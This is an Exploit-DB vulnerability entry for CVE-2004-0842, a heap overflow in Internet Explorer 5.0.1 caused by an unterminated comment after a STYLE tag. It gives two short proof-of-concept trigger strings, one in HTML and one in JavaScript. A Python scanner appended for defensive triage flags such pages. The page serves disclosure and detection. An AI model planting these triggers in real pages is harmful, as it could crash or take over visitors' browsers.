Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability

2004-07-08T00:00:00
ID EDB-ID:24328
Type exploitdb
Reporter Phuong Nguyen
Modified 2004-07-08T00:00:00

Description

Microsoft Internet Explorer 5.0.1 Style Tag Comment Memory Corruption Vulnerability. CVE-2004-0842. Remote exploit for the Windows platform.

source: http://www.securityfocus.com/bid/10816/info

A heap overflow vulnerability has been discovered in Internet Explorer. The issue reportedly presents itself when an unterminated comment character sequence is encountered after a STYLE tag.

This issue could be exploited by a remote attacker to execute arbitrary code in the context of the client user. The attacker would likely create a malicious HTML page and host it on a site. The attacker would then attempt to entice a user to visit the malicious page to carry out a successful attack.

<style>;@/* 

And by "Berend-Jan Wever" <skylined@edup.tudelft.nl>:

<SCRIPT>
d = window.open().document;
d.write("x");
d.body.innerHTML = "<STYLE>@;/*";
</SCRIPT>
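
For content filtering or triage of archived pages, the condition described above (a comment opened after a STYLE tag and never terminated) can be checked with a raw-text scan. This is an added example, not part of the original advisory; the function names are hypothetical, and the scan is a heuristic that only sees markup appearing literally in the input.

```python
import re

# Opening and closing STYLE tags, any case; attributes allowed on the opener.
STYLE_OPEN = re.compile(r"<style\b[^>]*>", re.IGNORECASE)
STYLE_CLOSE = re.compile(r"</style\s*>", re.IGNORECASE)


def has_open_comment(css):
    """True if css contains a /* that is never closed by */."""
    pos = 0
    while True:
        start = css.find("/*", pos)
        if start == -1:
            return False
        end = css.find("*/", start + 2)
        if end == -1:
            return True
        pos = end + 2


def unterminated_style_comments(html):
    """Return offsets of STYLE tags whose content leaves a comment open.

    Content runs to the matching </style>, or to end of input when the
    element is never closed (the case in both samples from this page).
    """
    hits = []
    for tag in STYLE_OPEN.finditer(html):
        close = STYLE_CLOSE.search(html, tag.end())
        body = html[tag.end():close.start() if close else len(html)]
        if has_open_comment(body):
            hits.append(tag.start())
    return hits


# Inputs: the two strings shown on this page, plus one constructed benign page.
SAMPLES = {
    "page sample 1": "<style>;@/* ",
    "page sample 2": 'd.body.innerHTML = "<STYLE>@;/*";\n</SCRIPT>',
    "constructed benign": "<style>/* note */ p { color: red }</style>",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, unterminated_style_comments(text))
```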